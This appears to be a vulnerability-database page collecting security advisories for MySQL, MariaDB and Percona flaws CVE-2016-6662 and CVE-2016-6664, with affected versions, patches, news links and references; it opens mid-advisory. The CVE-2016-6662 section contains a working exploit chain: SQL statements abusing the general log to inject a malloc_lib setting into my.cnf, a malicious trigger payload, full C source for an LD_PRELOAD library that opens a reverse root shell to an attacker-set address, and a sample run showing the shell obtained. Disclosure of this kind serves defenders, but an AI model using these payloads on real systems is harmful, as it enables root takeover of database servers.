http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html VI. BUSINESS IMPACT ------------------------- Although the severity of this issue is lower on its own (attackers need to gain access to mysql system user), the vulnerability could easily be combined with the CVE-2016-6663 issue. The combination of the two would effectively allow low privileged local database users to escalate their system privileges to root system account and allow them to fully compromise the server which increases the severity of this issue. VII. SYSTEMS AFFECTED ------------------------- MySQL <= 5.5.51 <= 5.6.32 <= 5.7.14 MariaDB All current Percona Server < 5.5.51-38.2 < 5.6.32-78-1 < 5.7.14-8 Percona XtraDB Cluster < 5.6.32-25.17 < 5.7.14-26.17 < 5.5.41-37.0 VIII. SOLUTION ------------------------- Vendors have released patches after private disclosure. Update to the latest version of your DBMS. IX. REFERENCES ------------------------- http://legalhackers.com This advisory: http://legalhackers.com/advisories/MySQL-Maria-Percona-RootPrivEsc-CVE-2016-6664-5617-Exploit.html Exploit source code: http://legalhackers.com/exploits/CVE-2016-6664/mysql-chowned.sh Related mysql vulnerabilities discovered by the author of thid advisory that can be chained with the CVE-2016-6664 vulnerability: CVE-2016-6663: http://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html CVE-2016-6662: http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html Video PoC: http://legalhackers.com/videos/MySQL-MariaDB-PerconaDB-PrivEsc-Race-CVE-2016-6663-5616-6664-5617-Exploits.html CVE-2016-6664 http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6664 Oracle CPU: http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html#AppendixMSQL X. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com http://legalhackers.com XI. REVISION HISTORY ------------------------- 01.11.2016 - Advisory released XII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. id SSV:92513 last seen 2017-11-19 modified 2016-11-02 published 2016-11-02 reporter Root source https://www.seebug.org/vuldb/ssvid-92513 title MySQL / MariaDB / PerconaDB elevation of privilege vulnerability, CVE-2016-6664) bulletinFamily exploit description - http://legalhackers.com - dawid (at) legalhackers.com - Release date: 12.09.2016 I. VULNERABILITY ------------------------- MySQL <= 5.7.15 Remote Root Code Execution / Privilege Escalation (0day) 5.6.33 5.5.52 MySQL clones are also affected, including: MariaDB PerconaDB II. BACKGROUND ------------------------- "MySQL is the world's most popular open source database. Whether you are a fast growing web property, technology ISV or large enterprise, MySQL can cost-effectively help you deliver high performance, scalable database applications." "Many of the world's largest and fastest-growing organizations including Facebook, Google, Adobe, Alcatel Lucent and Zappos rely on MySQL to save time and money powering their high-volume Web sites, business-critical systems and packaged software." * http://www.mysql.com/products/ * http://www.mysql.com/why-mysql/ * http://db-engines.com/en/system/MySQL III. INTRODUCTION ------------------------- An independent research has revealed multiple severe MySQL vulnerabilities. This advisory focuses on a critical vulnerability with a CVEID of CVE-2016-6662 which can allow attackers to (remotely) inject malicious settings into MySQL configuration files (my.cnf) leading to critical consequences. The vulnerability affects all MySQL servers in default configuration in all version branches (5.7, 5.6, and 5.5) including the latest versions, and could be exploited by both local and remote attackers. Both the authenticated access to MySQL database (via network connection or web interfaces such as phpMyAdmin) and SQL Injection could be used as exploitation vectors. As SQL Injection attacks are one of the most common issues in web applications, the CVE-2016-6662 vulnerabilty could put web applications at a critical risk in case of a successful SQL Injection attack. A successful exploitation could allow attackers to execute arbitrary code with root privileges which would then allow them to fully compromise the server on which an affected version of MySQL is running. Official patches for the vulnerability are not available at this time for Oracle MySQL server. The vulnerability can be exploited even if security modules SELinux and AppArmor are installed with default active policies for MySQL service on major Linux distributions. This advisory provides a Proof-Of-Concept MySQL exploit which demonstrates how Remote Root Code Execution could be achieved by attackers. IV. DESCRIPTION ------------------------- The default MySQL package comes with a mysqld_safe script which is used by many default installations/packages of MySQL as a wrapper to start the MySQL service process which can observed, for example, in case of the following fully-updated Debian system: ``` root@debian:~# lsb_release -a No LSB modules are available. Distributor ID: Debian Description: Debian GNU/Linux 8.5 (jessie) Release: 8.5 Codename: jessie root@debian:~# dpkg -l | grep -i mysql-server ii mysql-server 5.5.50-0+deb8u1 ii mysql-server-5.5 5.5.50-0+deb8u1 ii mysql-server-core-5.5 5.5.50-0+deb8u1 ``` After starting MySQL (installed from packages provided in the default Debian repositories) by running root@debian:~# service mysql start or, alternatively: ``` root@debian:~# /etc/init.d/mysql start The MySQL server process tree looks as follows: root 14967 0.0 0.1 4340 1588 ? S 06:41 0:00 /bin/sh /usr/bin/mysqld_safe mysql 15314 1.2 4.7 558160 47736 ? Sl 06:41 0:00 /usr/sbin/mysqld --basedir=/usr --datadir=/var/lib/mysql --plugin-dir=/usr/lib/mysql/plugin --user=mysql --log-error=/var/log/mysql/error.log --pid-file=/var/run/mysqld/mysqld.pid --socket=/var/run/mysqld/mysqld.sock --port=3306 ``` As can be seen, the mysqld_safe wrapper script is executed as root, whereas the main mysqld process drops its privileges to mysql user. The wrapper script has the following function : ----[ /usr/bin/mysqld_safe ]---- ``` [...] # set_malloc_lib LIB # - If LIB is empty, do nothing and return # - If LIB is 'tcmalloc', look for tcmalloc shared library in /usr/lib # then pkglibdir. tcmalloc is part of the Google perftools project. # - If LIB is an absolute path, assume it is a malloc shared library # # Put LIB in mysqld_ld_preload, which will be added to LD_PRELOAD when # running mysqld. See ld.so for details. set_malloc_lib() { malloc_lib="$1" if [ "$malloc_lib" = tcmalloc ]; then pkglibdir=`get_mysql_config --variable=pkglibdir` malloc_lib= # This list is kept intentionally simple. Simply set --malloc-lib # to a full path if another location is desired. for libdir in /usr/lib "$pkglibdir" "$pkglibdir/mysql"; do for flavor in _minimal '' _and_profiler _debug; do tmp="$libdir/libtcmalloc$flavor.so" #log_notice "DEBUG: Checking for malloc lib '$tmp'" [ -r "$tmp" ] || continue malloc_lib="$tmp" break 2 done done [...] ``` which can be used to preload a shared library before starting the server. The library can be set with the following parameter: --malloc-lib=LIB This parameter can also be specified within a mysql config file (my.cnf) in a '[mysqld]' or '[mysqld_safe]' section. If an attacker managed to inject a path to their malicious library within the config, they would be able to preload an arbitrary library and thus execute arbitrary code with root privileges when MySQL service is restarted (manually, via a system update, package update, system reboot etc.) In 2003 a vulnerability was disclosed in MySQL versions before 3.23.55 that allowed users to create mysql config files with a simple statement: ``` SELECT * INFO OUTFILE '/var/lib/mysql/my.cnf' ``` The issue was fixed by refusing to load config files with world-writable permissions as these are the default permissions applied to files created by OUTFILE query. As an additional protection, OUTFILE/DUMPFILE statements are prohibited from overwrite existing files. This protects existing configuration files. The old vulnerability has been considered fixed ever since the MySQL 3.23.55 was released in 2003, and writing to configuration files has been considered impossible. However, the V. PROOF OF CONCEPT section below will show that it is possible to successfully bypass current restrictions by abusing MySQL logging functions (available in every MySQL install by default) to achieve the following: 1) Inject malicious configuration into existing MySQL configuration files on systems with weak/improper permissions (configs owned by/writable by mysql user). 2) Create new configuration files within a MySQL data directory (writable by MySQL by default) on _default_ MySQL installs without the need to rely on improper config permisions. 3) Attackers with only SELECT/FILE permissions can gain access to logging functions (normally only available to MySQL admin users) on all of the _default_ MySQL installations and thus be in position to add/modify MySQL config files. V. PROOF OF CONCEPT ------------------------- 1) Inject malicious configuration into existing MySQL configuration files on systems with weak/improper permissions (configs owned by/writable by mysql user). ~~~~~~~~~~~~~~~~~~~~~~~~~ MySQL configuration files are loaded from all supported locations and processed one by one when mysqld_safe script is executed. Exact config locations depend on MySQL version. For example, as described on: http://dev.mysql.com/doc/refman/5.5/en/option-files.html for MySQL 5.5 the config locations include: /etc/my.cnf Global options /etc/mysql/my.cnf Global options SYSCONFDIR/my.cnf Global options $MYSQL_HOME/my.cnf Server-specific options defaults-extra-file The file specified with --defaults-extra-file=file_name, if any ~/.my.cnf User-specific options There is a common misconception that mysql config files should be owned by mysql user for the server to work properly. Many installation guides, or even security guides often wrongly advise users to set the ownership of mysql config files/directories such as /etc/mysql or /etc/my.cnf to mysql user. For example: https://github.com/willfong/mariadb-backup/blob/master/README.md says: "Lock down permissions on config file(s) chown mysql /etc/my.cnf chmod 600 /etc/my.cnf" Whereas the article at: http://www.devshed.com/c/a/mysql/security-issues-with-mysql/ mentions: "You should also protect the global option file, /etc/my.cnf, if it exists. The mysql user should own it and have read/write access to it, but other users need only read access: shell> chown mysql /etc/my.cnf" Moreover, there are also MySQL recipes for installation automatation software such as Chef that also provide users with vulnerable permissions on my.cnf config files. If any of the MySQL config files is owned by mysql user, an attacker could append malicious config entries to it as follows: root@debian:~/# ls -l /etc/my.cnf -rw-r--r-- 1 mysql mysql 72 Jul 28 17:20 /etc/my.cnf root@debian:~/# cat /etc/my.cnf [mysqld] key_buffer = 16M max_allowed_packet = 16M Attacker could run the following SQL queries: ``` mysql> set global general_log_file = '/etc/my.cnf'; mysql> set global general_log = on; mysql> select ' '> '> ; injected config entry '> '> [mysqld] '> malloc_lib=/tmp/mysql_exploit_lib.so '> '> [separator] '> '> '; 1 row in set (0.00 sec) mysql> set global general_log = off; The resulting config would then have the following part appended: root@debian:~/# cat /etc/my.cnf [mysqld] key_buffer = 16M max_allowed_packet = 16M /usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with: Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock Time Id Command Argument 160728 17:25:14 40 Query select ' ; injected config entry [mysqld] malloc_lib=/tmp/mysql_exploit_lib.so [separator] ' 160728 17:25:15 40 Query set global general_log = off ``` This config contains some redundant information that would normally cause MySQL to fail to startup during a restart due to parsing issues. However, the important part is that the config now contains the section: [mysqld] malloc_lib=/tmp/mysql_exploit_lib.so mysqld_safe will read the shared library path correctly and add it to the LD_PRELOAD environment variable before the startup of mysqld daemon. The preloaded library can then hook the libc fopen() calls and clean up the config before it is ever processed by mysqld daemon in order for it to start up successfully. ~~~~~~~~~~~~~~~~~~~~~~~~~ 2) Create new configuration files within a MySQL data directory (writable by MySQL by default) on _default_ MySQL installs without the need to rely on improper config permisions. Analysis of the mysqld_safe script has shown that in addition to the config locations provided above, mysqld_safe also loads the configuration file from the mysql data directory (/var/lib/mysql/my.cnf) by default as can be seen below: ----[ /usr/bin/mysqld_safe ]---- ``` [...] # Try where the binary installs put it if test -d $MY_BASEDIR_VERSION/data/mysql then DATADIR=$MY_BASEDIR_VERSION/data if test -z "$defaults" -a -r "$DATADIR/my.cnf" then defaults="--defaults-extra-file=$DATADIR/my.cnf" fi [...] ----------[ eof ]--------------- ``` on MySQL versions in branches 5.5 and 5.6. The datadir location for my.cnf has only been removed from MySQL starting from 5.7 branch however in many configurations it will still load config from: /var/lib/mysql/.my.cnf The data directory /var/lib/mysql is (obviously) writable by mysql user on every install: root@debian:~# ls -ld /var/lib/mysql/ drwx------ 4 mysql mysql 4096 Jul 28 06:41 /var/lib/mysql/ Therefore, if no mysql-owned configs are available on the system, an attacker could still be able to exploit the vulnerability by creating a config at the following locations: /var/lib/mysql/my.cnf /var/lib/mysql/.my.cnf As mentioned, using FILE permission to create such a file with the SQL statement: SELECT 'malicious config entry' INTO OUTFILE '/var/lib/mysql/my.cnf' would not work, as MySQL creates files with rw permissions for the world: -rw-rw-rw- 1 mysql mysql 4 Jul 28 07:46 /var/lib/mysql/my.cnf and MySQL would prevent such world-writable config from being loaded at startup. ``` Attackers could bypass this however by using these logging SQL statements: mysql> set global general_log_file = '/var/lib/mysql/my.cnf'; mysql> set global general_log = on; mysql> select ' '> '> ; injected config entry '> '> [mysqld] '> malloc_lib=/var/lib/mysql/mysql_hookandroot_lib.so '> '> [separator] '> '> '; 1 row in set (0.00 sec) mysql> set global general_log = off; The queries will create the my.cnf file with the necessary permissions (without o-w bit) for it to be parsed by the MySQL daemon: # ls -l /var/lib/mysql/my.cnf -rw-rw---- 1 mysql mysql 352 Jul 28 17:48 /var/lib/mysql/my.cnf The file will have the following contents: # cat /var/lib/mysql/my.cnf /usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with: Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock Time Id Command Argument 160728 17:48:22 43 Query select ' ; injected config entry [mysqld] malloc_lib=/var/lib/mysql/mysql_hookandroot_lib.so [separator] ' 160728 17:48:23 43 Query set global general_log = off ``` One problem will remain however. MySQL will refuse files that do not start with a valid [section] header with the message: error: Found option without preceding group in config file: /var/lib/mysql/my.cnf at line: 1 Fatal error in defaults handling. Program aborted Further testing has however proved that it is possible to bypass this security restriction as well but these will not be included in this advisory for the time being. It is worth to note that attackers could use one of the other vulnerabilities discovered by the author of this advisory which has been assigned a CVEID of CVE-2016-6663 and is pending disclosure. The undisclosed vulnerability makes it easy for certain attackers to create /var/lib/mysql/my.cnf file with arbitrary contents without the FILE privilege requirement. ~~~~~~~~~~~~~~~~~~~~~~~~~ 3) Attackers with only SELECT/FILE permissions can gain access to logging functions (normally only available to MySQL admin users) on all of the _default_ MySQL installations and thus be in position to add/modify MySQL config files. If attackers do not have administrative rights required to access logging settings and only have standard user privileges with the addition of FILE privilege then they could still gain the ability to write to / modify configuration files. This could be achieved by writing a malicious trigger payload: ``` CREATE DEFINER=`root`@`localhost` TRIGGER appendToConf AFTER INSERT ON `active_table` FOR EACH ROW BEGIN DECLARE void varchar(550); set global general_log_file='/var/lib/mysql/my.cnf'; set global general_log = on; select " [mysqld] malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so' " INTO void; set global general_log = off; END; into a trigger file of an actively used table ('active_table') with the use of a statement similar to: SELECT '....trigger_code...' INTO DUMPFILE /var/lib/mysql/activedb/active_table.TRG' Such trigger will be loaded when tables get flushed. From this point on whenever an INSERT statement is invoked on the table, e.g: INSERT INTO `active_table` VALUES('xyz'); ``` The trigger's code will be executed with mysql root user privileges (see 'definer' above) and will thus let attacker to modify the general_log settings despite the lack of administrative privileges on their standard account. ------------------ VI. PROOF OF CONCEPT - 0day 0ldSQL_MySQL_RCE_exploit.py exploit ----------[ 0ldSQL_MySQL_RCE_exploit.py ]-------------- --------------------------------------------------- ----------[ mysql_hookandroot_lib.c ]-------------- ``` /* (CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit mysql_hookandroot_lib.c This is the shared library injected by 0ldSQL_MySQL_RCE_exploit.py exploit. The library is meant to be loaded by mysqld_safe on mysqld daemon startup to create a reverse shell that connects back to the attacker's host on 6603 port (mysql port in reverse ;) and provides a root shell on the target. mysqld_safe will load this library through the following setting: [mysqld] malloc_lib=mysql_hookandroot_lib.so in one of the my.cnf config files (e.g. /etc/my.cnf). This shared library will hook the execvp() function which is called during the startup of mysqld process. It will then fork a reverse shell and clean up the poisoned my.cnf file in order to let mysqld run as normal so that: 'service mysql restart' will work without a problem. Before compiling adjust IP / PORT and config path. ~~ Discovered/Coded by: Dawid Golunski http://legalhackers.com ~~ Compilation (remember to choose settings compatible with the remote OS/arch): gcc -Wall -fPIC -shared -o mysql_hookandroot_lib.so mysql_hookandroot_lib.c -ldl Disclaimer: For testing purposes only. Do no harm. Full advisory URL: http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.txt */ #define _GNU_SOURCE #include <stdio.h> #include <sys/types.h> #include <sys/stat.h> #include <unistd.h> #include <string.h> #include <dlfcn.h> #include <stdlib.h> #include <stdarg.h> #include <fcntl.h> #include <sys/socket.h> #include <netinet/in.h> #include <arpa/inet.h> #define ATTACKERS_IP "127.0.0.1" #define SHELL_PORT 6033 #define INJECTED_CONF "/var/lib/mysql/my.cnf" char* env_list[] = { "HOME=/root", NULL }; typedef ssize_t (*execvp_func_t)(const char *__file, char *const __argv[]); static execvp_func_t old_execvp = NULL; // fork & send a bash shell to the attacker before starting mysqld void reverse_shell(void) { int i; int sockfd; //socklen_t socklen; struct sockaddr_in srv_addr; srv_addr.sin_family = AF_INET; srv_addr.sin_port = htons( SHELL_PORT ); // connect-back port srv_addr.sin_addr.s_addr = inet_addr(ATTACKERS_IP); // connect-back ip // create new TCP socket && connect sockfd = socket( AF_INET, SOCK_STREAM, IPPROTO_IP ); connect(sockfd, (struct sockaddr *)&srv_addr, sizeof(srv_addr)); for(i = 0; i <= 2; i++) dup2(sockfd, i); execle( "/bin/bash", "/bin/bash", "-i", NULL, env_list ); exit(0); } /* cleanup injected data from the target config before it is read by mysqld in order to ensure clean startup of the service The injection (if done via logging) will start with a line like this: /usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with: */ int config_cleanup() { FILE *conf; char buffer[2000]; long cut_offset=0; conf = fopen(INJECTED_CONF, "r+"); if (!conf) return 1; while (!feof(conf)) { fgets(buffer, sizeof(buffer), conf); if (strstr(buffer,"/usr/sbin/mysqld, Version")) { cut_offset = (ftell(conf) - strlen(buffer)); } } if (cut_offset>0) ftruncate(fileno(conf), cut_offset); fclose(conf); return 0; } // execvp() hook int execvp(const char* filename, char* const argv[]) { pid_t pid; int fd; // Simple root PoC (touch /root/root_via_mysql) fd = open("/root/root_via_mysql", O_CREAT); close(fd); old_execvp = dlsym(RTLD_NEXT, "execvp"); // Fork a reverse shell and execute the original execvp() function pid = fork(); if (pid == 0) reverse_shell(); // clean injected payload before mysqld is started config_cleanup(); return old_execvp(filename, argv); } ``` Replication / testing: ~~~~~~~~~~~~~~~~~~ As admin on the target system: ~~~~~~~~ 1. Set up a test database account/permissions: CREATE DATABASE pocdb; GRANT FILE ON *.* TO 'attacker'@'%' IDENTIFIED BY 'p0cpass!'; GRANT SELECT, INSERT, CREATE ON `pocdb`.* TO 'attacker'@'%'; 2. Simulate write access on any of available mysql configs. It just needs to be a valid/parsable config with section e.g: ``` [isamchk] key_buffer = 16M For example, /etc/mysql/my.cnf on Debian: # chown mysql:mysql /etc/mysql/my.cnf # ls -l /etc/mysql/my.cnf -rw-r--r-- 1 mysql mysql 3534 Sep 11 02:15 /etc/mysql/my.cnf ``` 3. Run the exploit as the attacker and restart mysql when exploit is done. As attacker: ~~~~~~~~ ``` 1. Enter your library path in mysql_hookandroot_lib.c src. 2. Run the 0ldSQL_MySQL_RCE_exploit.py script. ``` Example run: ~~~~~~~~ ``` attacker$ ./0ldSQL_MySQL_RCE_exploit.py -dbuser attacker -dbpass 'p0cpass!' -dbhost 192.168.1.10 -dbname pocdb -mycnf /etc/mysql/my.cnf 0ldSQL_MySQL_RCE_exploit.py (ver. 1.0) (CVE-2016-6662) MySQL Remote Root Code Execution / Privesc PoC Exploit For testing purposes only. Do no harm. Discovered/Coded by: Dawid Golunski http://legalhackers.com [+] Connecting to target server 192.168.1.10 and target mysql account '[email protected]' using DB 'pocdb' [+] The account in use has the following grants/perms: GRANT FILE ON *.* TO 'attacker'@'%' IDENTIFIED BY PASSWORD <secret> GRANT SELECT, INSERT, CREATE ON `pocdb`.* TO 'attacker'@'%' [+] Compiling mysql_hookandroot_lib.so [+] Converting mysql_hookandroot_lib.so into HEX [+] Saving trigger payload into /var/lib/mysql/pocdb/poctable.TRG [+] Dumping shared library into /var/lib/mysql/mysql_hookandroot_lib.so file on the target [+] Creating table 'poctable' so that injected 'poctable.TRG' trigger gets loaded [+] Inserting data to `poctable` in order to execute the trigger and write data to the target mysql config /etc/mysql/my.cnf [+] Showing the contents of /etc/mysql/my.cnf config to verify that our setting (malloc_lib) got injected [mysql] #no-auto-rehash # faster start of mysql but no tab completition [isamchk] key_buffer = 16M !includedir /etc/mysql/conf.d/ /usr/sbin/mysqld, Version: 5.5.50-0+deb8u1 ((Debian)). started with: Tcp port: 3306 Unix socket: /var/run/mysqld/mysqld.sock Time Id Command Argument 160912 8:48:41 44 Query select " # 0ldSQL_MySQL_RCE_exploit got here :) [mysqld] malloc_lib='/var/lib/mysql/mysql_hookandroot_lib.so' [abyss] " INTO void 44 Query SET global general_log = off [+] Looks messy? Have no fear, the preloaded lib mysql_hookandroot_lib.so will clean up all the mess before mysqld daemon even reads it :) [+] Everything is set up and ready. Spawning netcat listener and waiting for MySQL daemon to get restarted to get our rootshell... :) listening on [any] 6033 ... connect to [192.168.1.20] from dbserver [192.168.1.10] 36932 bash: cannot set terminal process group (963): Inappropriate ioctl for device bash: no job control in this shell root@debian:/# id id uid=0(root) gid=0(root) groups=0(root) root@debian:/# ls -l /root/root_via_mysql ---------- 1 root root 0 Sep 10 22:50 /root/root_via_mysql root@debian:/# exit exit exit [+] Shell closed. Hope you had fun. [+] Stay tuned for the CVE-2016-6663 advisory and/or a complete PoC that can craft a new valid my.cnf (i.e no writable my.cnf required) ;) [+] Exiting (code: 0) ``` VII. BUSINESS IMPACT ------------------------- As discussed above the vulnerability could be exploited by attackers with both privileged and unprivileged (with FILE privilege only) access to mysql accounts. It could also be combined with CVE-2016-6663 vulnerability which will be released shortly and could allow certain attackers to escalate their privileges to root even without FILE privilege. The vulnerability could also be exploited via an SQL injection vector, which removes the need for the attackers to have direct mysql connection and increases the risk of exploitation. Successful exploitation could gain a attacker a remote shell with root privileges which would allow them to fully compromise the remote system. If exploited, the malicious code would run as soon as MySQL daemon gets restarted. MySQL service restart could happen for a number of reasons. VIII. SYSTEMS AFFECTED ------------------------- All MySQL versions from the oldest versions to the latest shown at the beginnig of this advisory. Some systems run MySQL via Systemd and provide direct startup path to mysqld daemon instead of using mysqld_safe wrapper script. These systems however are also at risk as mysqld_safe may be called on update by the installation scripts or some other system services. Because the exploit only accesses files normally used by MySQL server ( such as the config), and the injected library is preloaded by mysqld_safe startup scripta not included within the default policies, the vulnerability can be exploited even if security modules as SELinux and AppArmor are installed with active security policies for the MySQL daemon. IX. VENDOR RESPONSE / SOLUTION ------------------------- The vulnerability was reported to Oracle on 29th of July 2016 and triaged by the security team. It was also reported to the other affected vendors including PerconaDB and MariaDB. The vulnerabilities were patched by PerconaDB and MariaDB vendors by the end of 30th of August. During the course of the patching by these vendors the patches went into public repositories and the fixed security issues were also mentioned in the new releases which could be noticed by malicious attackers. As over 40 days have passed since reporting the issues and patches were already mentioned publicly, a decision was made to start disclosing vulnerabilities (with limited PoC) to inform users about the risks before the vendor's next CPU update that only happens at the end of October. No official patches or mitigations are available at this time from the vendor. As temporary mitigations, users should ensure that no mysql config files are owned by mysql user, and create root-owned dummy my.cnf files that are not in use. These are by no means a complete solution and users should apply official vendor patches as soon as they become available. X. REFERENCES ------------------------- http://legalhackers.com http://legalhackers.com/advisories/MySQL-Exploit-Remote-Root-Code-Execution-Privesc-CVE-2016-6662.html Source codes from the advisory: http://legalhackers.com/exploits/0ldSQL_MySQL_RCE_exploit.py http://legalhackers.com/exploits/mysql_hookandroot_lib.c https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2016-6662 The old vulnerability fixed in MySQL version 3.23.55: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0150 XI. CREDITS ------------------------- The vulnerability has been discovered by Dawid Golunski dawid (at) legalhackers (dot) com http://legalhackers.com XII. REVISION HISTORY ------------------------- 12.09.2016 - Advisory released publicly as 0day XIII. LEGAL NOTICES ------------------------- The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. I accept no responsibility for any damage caused by the use or misuse of this information. id SSV:92405 last seen 2017-11-19 modified 2016-09-13 published 2016-09-13 reporter Root source https://www.seebug.org/vuldb/ssvid-92405 title MySQL <= 5.7.15 remote Root code execution vulnerability
The Hacker News
id THN:527125445EE758FC7D6A33333D6500EB last seen 2018-01-27 modified 2016-11-06 published 2016-11-02 reporter Swati Khandelwal source https://thehackernews.com/2016/11/mysql-zero-day-exploits.html title Critical Flaws in MySQL Give Hackers Root Access to Server (Exploits Released) id THN:F90DFDE36538EFED4DCD4B97D2929AAD last seen 2018-01-27 modified 2016-09-12 published 2016-09-12 reporter Mohit Kumar source https://thehackernews.com/2016/09/hack-mysql-database.html title New MySQL Zero Days — Hacking Website Databases
References
- http://seclists.org/fulldisclosure/2016/Nov/4
- http://www.securityfocus.com/bid/92911
- https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-1.html
- http://www.openwall.com/lists/oss-security/2016/10/25/4
- https://github.com/MariaDB/server/commit/347eeefbfc658c8531878218487d729f4e020805
- https://legalhackers.com/advisories/MySQL-Maria-Percona-PrivEscRace-CVE-2016-6663-5616-Exploit.html
- https://mariadb.com/kb/en/mariadb/mariadb-5552-release-notes/
- https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-52.html
- https://www.percona.com/blog/2016/11/02/percona-responds-to-cve-2016-6663-and-cve-2016-6664/
- https://www.exploit-db.com/exploits/40678/
- https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-15.html
- https://mariadb.com/kb/en/mariadb/mariadb-10118-release-notes/
- https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-33.html
- https://github.com/mysql/mysql-server/commit/4e5473862e6852b0f3802b0cd0c6fa10b5253291
- https://mariadb.com/kb/en/mariadb/mariadb-10028-release-notes/
- http://www.securityfocus.com/bid/93614
- http://www.oracle.com/technetwork/security-advisory/cpuoct2016-2881722.html
- http://rhn.redhat.com/errata/RHSA-2017-0184.html
- http://rhn.redhat.com/errata/RHSA-2016-2928.html
- http://rhn.redhat.com/errata/RHSA-2016-2927.html
- http://rhn.redhat.com/errata/RHSA-2016-2749.html
- http://rhn.redhat.com/errata/RHSA-2016-2595.html
- http://rhn.redhat.com/errata/RHSA-2016-2131.html
- http://rhn.redhat.com/errata/RHSA-2016-2130.html